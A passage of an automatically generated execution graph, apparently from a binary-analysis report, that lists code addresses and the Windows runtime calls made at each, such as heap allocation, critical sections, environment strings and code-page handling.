                                                                                                                        execution_graph 19093 7ff7c5bf9664 19096 7ff7c5be42f8 LeaveCriticalSection 19093->19096 17696 7ff7c5bf94de 17699 7ff7c5bf94ee 17696->17699 17700 7ff7c5be42f8 LeaveCriticalSection 17699->17700 17638 7ff7c5bee8dc 17639 7ff7c5beeace 17638->17639 17641 7ff7c5bee91e _isindst 17638->17641 17640 7ff7c5be4444 _wfindfirst32i64 11 API calls 17639->17640 17658 7ff7c5beeabe 17640->17658 17641->17639 17644 7ff7c5bee99e _isindst 17641->17644 17642 7ff7c5bdad80 _wfindfirst32i64 8 API calls 17643 7ff7c5beeae9 17642->17643 17659 7ff7c5bf53b4 17644->17659 17649 7ff7c5beeafa 17650 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 17649->17650 17652 7ff7c5beeb0e 17650->17652 17656 7ff7c5bee9fb 17656->17658 17683 7ff7c5bf53f8 17656->17683 17658->17642 17660 7ff7c5bf53c3 17659->17660 17664 7ff7c5bee9bc 17659->17664 17690 7ff7c5bef788 EnterCriticalSection 17660->17690 17665 7ff7c5bf47b8 17664->17665 17666 7ff7c5bf47c1 17665->17666 17670 7ff7c5bee9d1 17665->17670 17667 7ff7c5be4444 _wfindfirst32i64 11 API calls 17666->17667 17668 7ff7c5bf47c6 17667->17668 17669 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17668->17669 17669->17670 17670->17649 17671 7ff7c5bf47e8 17670->17671 17672 7ff7c5bf47f1 17671->17672 17673 7ff7c5bee9e2 17671->17673 17674 7ff7c5be4444 _wfindfirst32i64 11 API calls 17672->17674 17673->17649 17677 7ff7c5bf4818 17673->17677 17675 7ff7c5bf47f6 17674->17675 17676 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17675->17676 17676->17673 17678 7ff7c5bf4821 17677->17678 17679 7ff7c5bee9f3 17677->17679 17680 7ff7c5be4444 _wfindfirst32i64 11 API calls 17678->17680 17679->17649 17679->17656 17681 7ff7c5bf4826 17680->17681 17682 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 17681->17682 17682->17679 17691 7ff7c5bef788 EnterCriticalSection 17683->17691 14685 7ff7c5bda370 14686 7ff7c5bda39e 14685->14686 14687 7ff7c5bda385 14685->14687 14687->14686 14690 7ff7c5becacc 14687->14690 14691 7ff7c5becb17 14690->14691 14695 7ff7c5becadb _wfindfirst32i64 14690->14695 14700 7ff7c5be4444 14691->14700 14693 7ff7c5becafe HeapAlloc 14694 7ff7c5bda3fc 14693->14694 14693->14695 14695->14691 14695->14693 14697 7ff7c5bf26b0 14695->14697 14703 7ff7c5bf26f0 14697->14703 14709 7ff7c5bea798 GetLastError 14700->14709 14702 7ff7c5be444d 14702->14694 14708 7ff7c5bef788 EnterCriticalSection 14703->14708 14710 7ff7c5bea7d9 FlsSetValue 14709->14710 14714 7ff7c5bea7bc 14709->14714 14711 7ff7c5bea7eb 14710->14711 14724 7ff7c5bea7c9 SetLastError 14710->14724 14726 7ff7c5bedd40 14711->14726 14714->14710 14714->14724 14716 7ff7c5bea818 FlsSetValue 14719 7ff7c5bea836 14716->14719 14720 7ff7c5bea824 FlsSetValue 14716->14720 14717 7ff7c5bea808 FlsSetValue 14718 7ff7c5bea811 14717->14718 14733 7ff7c5be9e18 14718->14733 14739 7ff7c5bea3c4 14719->14739 14720->14718 14724->14702 14731 7ff7c5bedd51 _wfindfirst32i64 14726->14731 14727 7ff7c5bedda2 14730 7ff7c5be4444 _wfindfirst32i64 10 API calls 14727->14730 14728 7ff7c5bedd86 HeapAlloc 14729 7ff7c5bea7fa 14728->14729 14728->14731 14729->14716 14729->14717 14730->14729 14731->14727 14731->14728 14732 7ff7c5bf26b0 _wfindfirst32i64 2 API calls 14731->14732 14732->14731 14734 7ff7c5be9e4c 14733->14734 14735 7ff7c5be9e1d RtlFreeHeap 14733->14735 14734->14724 14735->14734 14736 7ff7c5be9e38 GetLastError 14735->14736 14737 7ff7c5be9e45 __free_lconv_mon 14736->14737 14738 7ff7c5be4444 _wfindfirst32i64 9 API calls 14737->14738 14738->14734 14744 7ff7c5bea29c 14739->14744 14756 7ff7c5bef788 EnterCriticalSection 14744->14756 17705 7ff7c5bf07f0 17716 7ff7c5bf6764 17705->17716 17717 7ff7c5bf6771 17716->17717 17718 7ff7c5be9e18 __free_lconv_mon 11 API calls 17717->17718 17719 7ff7c5bf678d 17717->17719 17718->17717 17720 7ff7c5be9e18 __free_lconv_mon 11 API calls 17719->17720 17721 7ff7c5bf07f9 17719->17721 17720->17719 17722 7ff7c5bef788 EnterCriticalSection 17721->17722 17723 7ff7c5beb9f0 17734 7ff7c5bef788 EnterCriticalSection 17723->17734 17784 7ff7c5bf96f9 17785 7ff7c5bf9712 17784->17785 17786 7ff7c5bf9708 17784->17786 17788 7ff7c5bef7e8 LeaveCriticalSection 17786->17788 19204 7ff7c5be4290 19205 7ff7c5be429b 19204->19205 19213 7ff7c5bee354 19205->19213 19226 7ff7c5bef788 EnterCriticalSection 19213->19226 17875 7ff7c5befa08 17876 7ff7c5befa2c 17875->17876 17878 7ff7c5befa3c 17875->17878 17877 7ff7c5be4444 _wfindfirst32i64 11 API calls 17876->17877 17879 7ff7c5befa31 17877->17879 17880 7ff7c5befd1c 17878->17880 17881 7ff7c5befa5e 17878->17881 17882 7ff7c5be4444 _wfindfirst32i64 11 API calls 17880->17882 17883 7ff7c5befa7f 17881->17883 18006 7ff7c5bf00c4 17881->18006 17884 7ff7c5befd21 17882->17884 17887 7ff7c5befaf1 17883->17887 17888 7ff7c5befaa5 17883->17888 17893 7ff7c5befae5 17883->17893 17886 7ff7c5be9e18 __free_lconv_mon 11 API calls 17884->17886 17886->17879 17890 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17887->17890 17904 7ff7c5befab4 17887->17904 18021 7ff7c5be8518 17888->18021 17889 7ff7c5befb9e 17900 7ff7c5befbbb 17889->17900 17905 7ff7c5befc0d 17889->17905 17894 7ff7c5befb07 17890->17894 17893->17889 17893->17904 18027 7ff7c5bf64ac 17893->18027 17897 7ff7c5be9e18 __free_lconv_mon 11 API calls 17894->17897 17896 7ff7c5be9e18 __free_lconv_mon 11 API calls 17896->17879 17901 7ff7c5befb15 17897->17901 17898 7ff7c5befaaf 17902 7ff7c5be4444 _wfindfirst32i64 11 API calls 17898->17902 17899 7ff7c5befacd 17899->17893 17907 7ff7c5bf00c4 45 API calls 17899->17907 17903 7ff7c5be9e18 __free_lconv_mon 11 API calls 17900->17903 17901->17893 17901->17904 17909 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17901->17909 17902->17904 17906 7ff7c5befbc4 17903->17906 17904->17896 17905->17904 17908 7ff7c5bf24fc 40 API calls 17905->17908 17915 7ff7c5befbc9 17906->17915 18063 7ff7c5bf24fc 17906->18063 17907->17893 17910 7ff7c5befc4a 17908->17910 17911 7ff7c5befb37 17909->17911 17912 7ff7c5be9e18 __free_lconv_mon 11 API calls 17910->17912 17917 7ff7c5be9e18 __free_lconv_mon 11 API calls 17911->17917 17918 7ff7c5befc54 17912->17918 17914 7ff7c5befd10 17920 7ff7c5be9e18 __free_lconv_mon 11 API calls 17914->17920 17915->17914 17921 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17915->17921 17916 7ff7c5befbf5 17919 7ff7c5be9e18 __free_lconv_mon 11 API calls 17916->17919 17917->17893 17918->17904 17918->17915 17919->17915 17920->17879 17922 7ff7c5befc98 17921->17922 17923 7ff7c5befca0 17922->17923 17924 7ff7c5befca9 17922->17924 17925 7ff7c5be9e18 __free_lconv_mon 11 API calls 17923->17925 17926 7ff7c5be91ac __std_exception_copy 37 API calls 17924->17926 17927 7ff7c5befca7 17925->17927 17928 7ff7c5befcb8 17926->17928 17932 7ff7c5be9e18 __free_lconv_mon 11 API calls 17927->17932 17929 7ff7c5befcc0 17928->17929 17930 7ff7c5befd4b 17928->17930 18072 7ff7c5bf65c4 17929->18072 17931 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 17930->17931 17934 7ff7c5befd5f 17931->17934 17932->17879 17936 7ff7c5befd88 17934->17936 17944 7ff7c5befd98 17934->17944 17939 7ff7c5be4444 _wfindfirst32i64 11 API calls 17936->17939 17937 7ff7c5befce7 17941 7ff7c5be4444 _wfindfirst32i64 11 API calls 17937->17941 17938 7ff7c5befd08 17940 7ff7c5be9e18 __free_lconv_mon 11 API calls 17938->17940 17968 7ff7c5befd8d 17939->17968 17940->17914 17942 7ff7c5befcec 17941->17942 17943 7ff7c5be9e18 __free_lconv_mon 11 API calls 17942->17943 17943->17927 17945 7ff7c5bf007b 17944->17945 17946 7ff7c5befdba 17944->17946 17947 7ff7c5be4444 _wfindfirst32i64 11 API calls 17945->17947 17948 7ff7c5befdd7 17946->17948 18091 7ff7c5bf01ac 17946->18091 17949 7ff7c5bf0080 17947->17949 17952 7ff7c5befe4b 17948->17952 17954 7ff7c5befdff 17948->17954 17958 7ff7c5befe3f 17948->17958 17951 7ff7c5be9e18 __free_lconv_mon 11 API calls 17949->17951 17951->17968 17956 7ff7c5befe73 17952->17956 17959 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17952->17959 17973 7ff7c5befe0e 17952->17973 17953 7ff7c5befefe 17967 7ff7c5beff1b 17953->17967 17974 7ff7c5beff6e 17953->17974 18106 7ff7c5be8554 17954->18106 17956->17958 17961 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17956->17961 17956->17973 17958->17953 17958->17973 18112 7ff7c5bf636c 17958->18112 17963 7ff7c5befe65 17959->17963 17966 7ff7c5befe95 17961->17966 17962 7ff7c5be9e18 __free_lconv_mon 11 API calls 17962->17968 17969 7ff7c5be9e18 __free_lconv_mon 11 API calls 17963->17969 17964 7ff7c5befe09 17970 7ff7c5be4444 _wfindfirst32i64 11 API calls 17964->17970 17965 7ff7c5befe27 17965->17958 17976 7ff7c5bf01ac 45 API calls 17965->17976 17971 7ff7c5be9e18 __free_lconv_mon 11 API calls 17966->17971 17972 7ff7c5be9e18 __free_lconv_mon 11 API calls 17967->17972 17969->17956 17970->17973 17971->17958 17975 7ff7c5beff24 17972->17975 17973->17962 17974->17973 17977 7ff7c5bf24fc 40 API calls 17974->17977 17979 7ff7c5bf24fc 40 API calls 17975->17979 17983 7ff7c5beff2a 17975->17983 17976->17958 17978 7ff7c5beffac 17977->17978 17980 7ff7c5be9e18 __free_lconv_mon 11 API calls 17978->17980 17981 7ff7c5beff56 17979->17981 17984 7ff7c5beffb6 17980->17984 17985 7ff7c5be9e18 __free_lconv_mon 11 API calls 17981->17985 17982 7ff7c5bf006f 17986 7ff7c5be9e18 __free_lconv_mon 11 API calls 17982->17986 17983->17982 17987 7ff7c5bedd40 _wfindfirst32i64 11 API calls 17983->17987 17984->17973 17984->17983 17985->17983 17986->17968 17988 7ff7c5befffb 17987->17988 17989 7ff7c5bf0003 17988->17989 17990 7ff7c5bf000c 17988->17990 17991 7ff7c5be9e18 __free_lconv_mon 11 API calls 17989->17991 17992 7ff7c5bef924 _wfindfirst32i64 37 API calls 17990->17992 17993 7ff7c5bf000a 17991->17993 17994 7ff7c5bf001a 17992->17994 17998 7ff7c5be9e18 __free_lconv_mon 11 API calls 17993->17998 17995 7ff7c5bf0022 SetEnvironmentVariableW 17994->17995 17996 7ff7c5bf00af 17994->17996 17999 7ff7c5bf0046 17995->17999 18000 7ff7c5bf0067 17995->18000 17997 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 17996->17997 18001 7ff7c5bf00c3 17997->18001 17998->17968 18003 7ff7c5be4444 _wfindfirst32i64 11 API calls 17999->18003 18002 7ff7c5be9e18 __free_lconv_mon 11 API calls 18000->18002 18002->17982 18004 7ff7c5bf004b 18003->18004 18005 7ff7c5be9e18 __free_lconv_mon 11 API calls 18004->18005 18005->17993 18007 7ff7c5bf00e1 18006->18007 18008 7ff7c5bf00f9 18006->18008 18007->17883 18009 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18008->18009 18014 7ff7c5bf011d 18009->18014 18010 7ff7c5bf017e 18013 7ff7c5be9e18 __free_lconv_mon 11 API calls 18010->18013 18011 7ff7c5be920c _CallSETranslator 45 API calls 18012 7ff7c5bf01a8 18011->18012 18013->18007 18014->18010 18015 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18014->18015 18016 7ff7c5be9e18 __free_lconv_mon 11 API calls 18014->18016 18017 7ff7c5be91ac __std_exception_copy 37 API calls 18014->18017 18018 7ff7c5bf018d 18014->18018 18020 7ff7c5bf01a2 18014->18020 18015->18014 18016->18014 18017->18014 18019 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 18018->18019 18019->18020 18020->18011 18022 7ff7c5be8528 18021->18022 18023 7ff7c5be8531 18021->18023 18022->18023 18136 7ff7c5be7ff0 18022->18136 18023->17898 18023->17899 18028 7ff7c5bf565c 18027->18028 18029 7ff7c5bf64b9 18027->18029 18030 7ff7c5bf5669 18028->18030 18037 7ff7c5bf569f 18028->18037 18031 7ff7c5be4a1c 45 API calls 18029->18031 18034 7ff7c5be4444 _wfindfirst32i64 11 API calls 18030->18034 18047 7ff7c5bf5610 18030->18047 18032 7ff7c5bf64ed 18031->18032 18039 7ff7c5bf6503 18032->18039 18043 7ff7c5bf651a 18032->18043 18059 7ff7c5bf64f2 18032->18059 18033 7ff7c5bf56c9 18035 7ff7c5be4444 _wfindfirst32i64 11 API calls 18033->18035 18036 7ff7c5bf5673 18034->18036 18038 7ff7c5bf56ce 18035->18038 18040 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18036->18040 18037->18033 18041 7ff7c5bf56ee 18037->18041 18042 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18038->18042 18044 7ff7c5be4444 _wfindfirst32i64 11 API calls 18039->18044 18045 7ff7c5bf567e 18040->18045 18046 7ff7c5bf56d9 18041->18046 18051 7ff7c5be4a1c 45 API calls 18041->18051 18042->18046 18049 7ff7c5bf6536 18043->18049 18050 7ff7c5bf6524 18043->18050 18048 7ff7c5bf6508 18044->18048 18045->17893 18046->17893 18047->17893 18054 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18048->18054 18052 7ff7c5bf655e 18049->18052 18053 7ff7c5bf6547 18049->18053 18055 7ff7c5be4444 _wfindfirst32i64 11 API calls 18050->18055 18051->18046 18383 7ff7c5bf8388 18052->18383 18374 7ff7c5bf56ac 18053->18374 18054->18059 18058 7ff7c5bf6529 18055->18058 18061 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18058->18061 18059->17893 18061->18059 18062 7ff7c5be4444 _wfindfirst32i64 11 API calls 18062->18059 18064 7ff7c5bf251e 18063->18064 18065 7ff7c5bf253b 18063->18065 18064->18065 18066 7ff7c5bf252c 18064->18066 18067 7ff7c5bf2545 18065->18067 18423 7ff7c5bf6fb8 18065->18423 18068 7ff7c5be4444 _wfindfirst32i64 11 API calls 18066->18068 18430 7ff7c5bef98c 18067->18430 18070 7ff7c5bf2531 __scrt_get_show_window_mode 18068->18070 18070->17916 18073 7ff7c5be4a1c 45 API calls 18072->18073 18074 7ff7c5bf662a 18073->18074 18075 7ff7c5bedfcc 5 API calls 18074->18075 18076 7ff7c5bf6638 18074->18076 18075->18076 18077 7ff7c5be4504 14 API calls 18076->18077 18078 7ff7c5bf6694 18077->18078 18079 7ff7c5bf6724 18078->18079 18080 7ff7c5be4a1c 45 API calls 18078->18080 18082 7ff7c5bf6735 18079->18082 18083 7ff7c5be9e18 __free_lconv_mon 11 API calls 18079->18083 18081 7ff7c5bf66a7 18080->18081 18085 7ff7c5bedfcc 5 API calls 18081->18085 18089 7ff7c5bf66b0 18081->18089 18084 7ff7c5befce3 18082->18084 18086 7ff7c5be9e18 __free_lconv_mon 11 API calls 18082->18086 18083->18082 18084->17937 18084->17938 18085->18089 18086->18084 18087 7ff7c5be4504 14 API calls 18088 7ff7c5bf670b 18087->18088 18088->18079 18090 7ff7c5bf6713 SetEnvironmentVariableW 18088->18090 18089->18087 18090->18079 18092 7ff7c5bf01ec 18091->18092 18099 7ff7c5bf01cf 18091->18099 18093 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18092->18093 18094 7ff7c5bf0210 18093->18094 18095 7ff7c5bf0271 18094->18095 18100 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18094->18100 18101 7ff7c5be9e18 __free_lconv_mon 11 API calls 18094->18101 18102 7ff7c5bef924 _wfindfirst32i64 37 API calls 18094->18102 18103 7ff7c5bf0280 18094->18103 18105 7ff7c5bf0294 18094->18105 18098 7ff7c5be9e18 __free_lconv_mon 11 API calls 18095->18098 18096 7ff7c5be920c _CallSETranslator 45 API calls 18097 7ff7c5bf029a 18096->18097 18098->18099 18099->17948 18100->18094 18101->18094 18102->18094 18104 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 18103->18104 18104->18105 18105->18096 18107 7ff7c5be8564 18106->18107 18110 7ff7c5be856d 18106->18110 18107->18110 18442 7ff7c5be8064 18107->18442 18110->17964 18110->17965 18113 7ff7c5bf6379 18112->18113 18117 7ff7c5bf63a6 18112->18117 18114 7ff7c5bf637e 18113->18114 18113->18117 18115 7ff7c5be4444 _wfindfirst32i64 11 API calls 18114->18115 18116 7ff7c5bf6383 18115->18116 18119 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18116->18119 18118 7ff7c5bf63ea 18117->18118 18120 7ff7c5bf6409 18117->18120 18134 7ff7c5bf63de __crtLCMapStringW 18117->18134 18121 7ff7c5be4444 _wfindfirst32i64 11 API calls 18118->18121 18122 7ff7c5bf638e 18119->18122 18123 7ff7c5bf6425 18120->18123 18124 7ff7c5bf6413 18120->18124 18125 7ff7c5bf63ef 18121->18125 18122->17958 18127 7ff7c5be4a1c 45 API calls 18123->18127 18126 7ff7c5be4444 _wfindfirst32i64 11 API calls 18124->18126 18128 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18125->18128 18129 7ff7c5bf6418 18126->18129 18130 7ff7c5bf6432 18127->18130 18128->18134 18131 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18129->18131 18130->18134 18489 7ff7c5bf7f44 18130->18489 18131->18134 18134->17958 18135 7ff7c5be4444 _wfindfirst32i64 11 API calls 18135->18134 18137 7ff7c5be8005 18136->18137 18138 7ff7c5be8009 18136->18138 18137->18023 18151 7ff7c5be8344 18137->18151 18159 7ff7c5bf1730 18138->18159 18143 7ff7c5be801b 18146 7ff7c5be9e18 __free_lconv_mon 11 API calls 18143->18146 18144 7ff7c5be8027 18185 7ff7c5be80d4 18144->18185 18146->18137 18148 7ff7c5be9e18 __free_lconv_mon 11 API calls 18149 7ff7c5be804e 18148->18149 18150 7ff7c5be9e18 __free_lconv_mon 11 API calls 18149->18150 18150->18137 18152 7ff7c5be836d 18151->18152 18155 7ff7c5be8386 18151->18155 18152->18023 18153 7ff7c5bef0b8 WideCharToMultiByte 18153->18155 18154 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18154->18155 18155->18152 18155->18153 18155->18154 18156 7ff7c5be8416 18155->18156 18158 7ff7c5be9e18 __free_lconv_mon 11 API calls 18155->18158 18157 7ff7c5be9e18 __free_lconv_mon 11 API calls 18156->18157 18157->18152 18158->18155 18160 7ff7c5bf173d 18159->18160 18161 7ff7c5be800e 18159->18161 18204 7ff7c5bea6f4 18160->18204 18165 7ff7c5bf1a6c GetEnvironmentStringsW 18161->18165 18166 7ff7c5be8013 18165->18166 18167 7ff7c5bf1a9c 18165->18167 18166->18143 18166->18144 18168 7ff7c5bef0b8 WideCharToMultiByte 18167->18168 18169 7ff7c5bf1aed 18168->18169 18170 7ff7c5bf1af4 FreeEnvironmentStringsW 18169->18170 18171 7ff7c5becacc _fread_nolock 12 API calls 18169->18171 18170->18166 18172 7ff7c5bf1b07 18171->18172 18173 7ff7c5bf1b0f 18172->18173 18174 7ff7c5bf1b18 18172->18174 18175 7ff7c5be9e18 __free_lconv_mon 11 API calls 18173->18175 18176 7ff7c5bef0b8 WideCharToMultiByte 18174->18176 18177 7ff7c5bf1b16 18175->18177 18178 7ff7c5bf1b3b 18176->18178 18177->18170 18179 7ff7c5bf1b3f 18178->18179 18180 7ff7c5bf1b49 18178->18180 18181 7ff7c5be9e18 __free_lconv_mon 11 API calls 18179->18181 18182 7ff7c5be9e18 __free_lconv_mon 11 API calls 18180->18182 18183 7ff7c5bf1b47 FreeEnvironmentStringsW 18181->18183 18182->18183 18183->18166 18186 7ff7c5be80f9 18185->18186 18187 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18186->18187 18188 7ff7c5be812f 18187->18188 18190 7ff7c5be81aa 18188->18190 18193 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18188->18193 18194 7ff7c5be8199 18188->18194 18195 7ff7c5be91ac __std_exception_copy 37 API calls 18188->18195 18198 7ff7c5be81cf 18188->18198 18201 7ff7c5be9e18 __free_lconv_mon 11 API calls 18188->18201 18202 7ff7c5be8137 18188->18202 18189 7ff7c5be9e18 __free_lconv_mon 11 API calls 18191 7ff7c5be802f 18189->18191 18192 7ff7c5be9e18 __free_lconv_mon 11 API calls 18190->18192 18191->18148 18192->18191 18193->18188 18368 7ff7c5be8300 18194->18368 18195->18188 18200 7ff7c5be9dd0 _wfindfirst32i64 17 API calls 18198->18200 18199 7ff7c5be9e18 __free_lconv_mon 11 API calls 18199->18202 18203 7ff7c5be81e2 18200->18203 18201->18188 18202->18189 18205 7ff7c5bea705 FlsGetValue 18204->18205 18206 7ff7c5bea720 FlsSetValue 18204->18206 18207 7ff7c5bea712 18205->18207 18208 7ff7c5bea71a 18205->18208 18206->18207 18209 7ff7c5bea72d 18206->18209 18210 7ff7c5bea718 18207->18210 18211 7ff7c5be920c _CallSETranslator 45 API calls 18207->18211 18208->18206 18212 7ff7c5bedd40 _wfindfirst32i64 11 API calls 18209->18212 18224 7ff7c5bf1404 18210->18224 18213 7ff7c5bea795 18211->18213 18214 7ff7c5bea73c 18212->18214 18215 7ff7c5bea75a FlsSetValue 18214->18215 18216 7ff7c5bea74a FlsSetValue 18214->18216 18218 7ff7c5bea766 FlsSetValue 18215->18218 18219 7ff7c5bea778 18215->18219 18217 7ff7c5bea753 18216->18217 18220 7ff7c5be9e18 __free_lconv_mon 11 API calls 18217->18220 18218->18217 18221 7ff7c5bea3c4 _wfindfirst32i64 11 API calls 18219->18221 18220->18207 18222 7ff7c5bea780 18221->18222 18223 7ff7c5be9e18 __free_lconv_mon 11 API calls 18222->18223 18223->18210 18247 7ff7c5bf1674 18224->18247 18226 7ff7c5bf1439 18262 7ff7c5bf1104 18226->18262 18229 7ff7c5bf1456 18229->18161 18230 7ff7c5becacc _fread_nolock 12 API calls 18231 7ff7c5bf1467 18230->18231 18232 7ff7c5bf146f 18231->18232 18234 7ff7c5bf147e 18231->18234 18233 7ff7c5be9e18 __free_lconv_mon 11 API calls 18232->18233 18233->18229 18234->18234 18269 7ff7c5bf17ac 18234->18269 18237 7ff7c5bf157a 18238 7ff7c5be4444 _wfindfirst32i64 11 API calls 18237->18238 18239 7ff7c5bf157f 18238->18239 18241 7ff7c5be9e18 __free_lconv_mon 11 API calls 18239->18241 18240 7ff7c5bf15d5 18246 7ff7c5bf163c 18240->18246 18280 7ff7c5bf0f34 18240->18280 18241->18229 18242 7ff7c5bf1594 18242->18240 18244 7ff7c5be9e18 __free_lconv_mon 11 API calls 18242->18244 18243 7ff7c5be9e18 __free_lconv_mon 11 API calls 18243->18229 18244->18240 18246->18243 18248 7ff7c5bf1697 18247->18248 18250 7ff7c5bf16a1 18248->18250 18295 7ff7c5bef788 EnterCriticalSection 18248->18295 18251 7ff7c5bf1713 18250->18251 18254 7ff7c5be920c _CallSETranslator 45 API calls 18250->18254 18251->18226 18255 7ff7c5bf172b 18254->18255 18258 7ff7c5bf1782 18255->18258 18259 7ff7c5bea6f4 50 API calls 18255->18259 18258->18226 18260 7ff7c5bf176c 18259->18260 18261 7ff7c5bf1404 65 API calls 18260->18261 18261->18258 18263 7ff7c5be4a1c 45 API calls 18262->18263 18264 7ff7c5bf1118 18263->18264 18265 7ff7c5bf1136 18264->18265 18266 7ff7c5bf1124 GetOEMCP 18264->18266 18267 7ff7c5bf114b 18265->18267 18268 7ff7c5bf113b GetACP 18265->18268 18266->18267 18267->18229 18267->18230 18268->18267 18270 7ff7c5bf1104 47 API calls 18269->18270 18271 7ff7c5bf17d9 18270->18271 18273 7ff7c5bf1816 IsValidCodePage 18271->18273 18278 7ff7c5bf192f 18271->18278 18279 7ff7c5bf1830 __scrt_get_show_window_mode 18271->18279 18272 7ff7c5bdad80 _wfindfirst32i64 8 API calls 18274 7ff7c5bf1571 18272->18274 18275 7ff7c5bf1827 18273->18275 18273->18278 18274->18237 18274->18242 18276 7ff7c5bf1856 GetCPInfo 18275->18276 18275->18279 18276->18278 18276->18279 18278->18272 18296 7ff7c5bf121c 18279->18296 18367 7ff7c5bef788 EnterCriticalSection 18280->18367 18297 7ff7c5bf1259 GetCPInfo 18296->18297 18298 7ff7c5bf134f 18296->18298 18297->18298 18300 7ff7c5bf126c 18297->18300 18299 7ff7c5bdad80 _wfindfirst32i64 8 API calls 18298->18299 18301 7ff7c5bf13ee 18299->18301 18307 7ff7c5bf1f60 18300->18307 18301->18278 18306 7ff7c5bf6f04 54 API calls 18306->18298 18308 7ff7c5be4a1c 45 API calls 18307->18308 18309 7ff7c5bf1fa2 18308->18309 18310 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18309->18310 18312 7ff7c5bf1fd8 18310->18312 18311 7ff7c5bf1fdf 18313 7ff7c5bdad80 _wfindfirst32i64 8 API calls 18311->18313 18312->18311 18314 7ff7c5becacc _fread_nolock 12 API calls 18312->18314 18316 7ff7c5bf209c 18312->18316 18318 7ff7c5bf2008 __scrt_get_show_window_mode 18312->18318 18315 7ff7c5bf12e3 18313->18315 18314->18318 18322 7ff7c5bf6f04 18315->18322 18316->18311 18317 7ff7c5be9e18 __free_lconv_mon 11 API calls 18316->18317 18317->18311 18318->18316 18319 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18318->18319 18320 7ff7c5bf207e 18319->18320 18320->18316 18321 7ff7c5bf2082 GetStringTypeW 18320->18321 18321->18316 18323 7ff7c5be4a1c 45 API calls 18322->18323 18324 7ff7c5bf6f29 18323->18324 18327 7ff7c5bf6bd0 18324->18327 18328 7ff7c5bf6c11 18327->18328 18329 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18328->18329 18333 7ff7c5bf6c5b 18329->18333 18330 7ff7c5bf6ed9 18331 7ff7c5bdad80 _wfindfirst32i64 8 API calls 18330->18331 18332 7ff7c5bf1316 18331->18332 18332->18306 18333->18330 18334 7ff7c5becacc _fread_nolock 12 API calls 18333->18334 18335 7ff7c5bf6d91 18333->18335 18336 7ff7c5bf6c93 18333->18336 18334->18336 18335->18330 18337 7ff7c5be9e18 __free_lconv_mon 11 API calls 18335->18337 18336->18335 18338 7ff7c5bee7f0 _fread_nolock MultiByteToWideChar 18336->18338 18337->18330 18339 7ff7c5bf6d06 18338->18339 18339->18335 18358 7ff7c5bee18c 18339->18358 18342 7ff7c5bf6d51 18342->18335 18345 7ff7c5bee18c __crtLCMapStringW 6 API calls 18342->18345 18343 7ff7c5bf6da2 18344 7ff7c5becacc _fread_nolock 12 API calls 18343->18344 18346 7ff7c5bf6e74 18343->18346 18348 7ff7c5bf6dc0 18343->18348 18344->18348 18345->18335 18346->18335 18347 7ff7c5be9e18 __free_lconv_mon 11 API calls 18346->18347 18347->18335 18348->18335 18349 7ff7c5bee18c __crtLCMapStringW 6 API calls 18348->18349 18350 7ff7c5bf6e40 18349->18350 18350->18346 18351 7ff7c5bf6e76 18350->18351 18352 7ff7c5bf6e60 18350->18352 18354 7ff7c5bef0b8 WideCharToMultiByte 18351->18354 18353 7ff7c5bef0b8 WideCharToMultiByte 18352->18353 18355 7ff7c5bf6e6e 18353->18355 18354->18355 18355->18346 18356 7ff7c5bf6e8e 18355->18356 18356->18335 18357 7ff7c5be9e18 __free_lconv_mon 11 API calls 18356->18357 18357->18335 18359 7ff7c5beddb8 __crtLCMapStringW 5 API calls 18358->18359 18360 7ff7c5bee1ca 18359->18360 18361 7ff7c5bee1d2 18360->18361 18364 7ff7c5bee278 18360->18364 18361->18335 18361->18342 18361->18343 18363 7ff7c5bee23b LCMapStringW 18363->18361 18365 7ff7c5beddb8 __crtLCMapStringW 5 API calls 18364->18365 18366 7ff7c5bee2a6 __crtLCMapStringW 18365->18366 18366->18363 18369 7ff7c5be8305 18368->18369 18370 7ff7c5be81a1 18368->18370 18371 7ff7c5be832e 18369->18371 18372 7ff7c5be9e18 __free_lconv_mon 11 API calls 18369->18372 18370->18199 18373 7ff7c5be9e18 __free_lconv_mon 11 API calls 18371->18373 18372->18369 18373->18370 18375 7ff7c5bf56e0 18374->18375 18376 7ff7c5bf56c9 18374->18376 18375->18376 18379 7ff7c5bf56ee 18375->18379 18377 7ff7c5be4444 _wfindfirst32i64 11 API calls 18376->18377 18378 7ff7c5bf56ce 18377->18378 18380 7ff7c5be9db0 _invalid_parameter_noinfo 37 API calls 18378->18380 18381 7ff7c5bf56d9 18379->18381 18382 7ff7c5be4a1c 45 API calls 18379->18382 18380->18381 18381->18059 18382->18381 18384 7ff7c5be4a1c 45 API calls 18383->18384 18385 7ff7c5bf83ad 18384->18385 18388 7ff7c5bf8004 18385->18388 18390 7ff7c5bf8052 18388->18390 18389 7ff7c5bdad80 _wfindfirst32i64 8 API calls 18391 7ff7c5bf6585 18389->18391 18393 7ff7c5bf80c4 GetCPInfo 18390->18393 18394 7ff7c5bf80d9 18390->18394 18398 7ff7c5bf80dd 18390->18398 18391->18059 18391->18062 18392 7ff7c5bee7f0 _fread_nolock 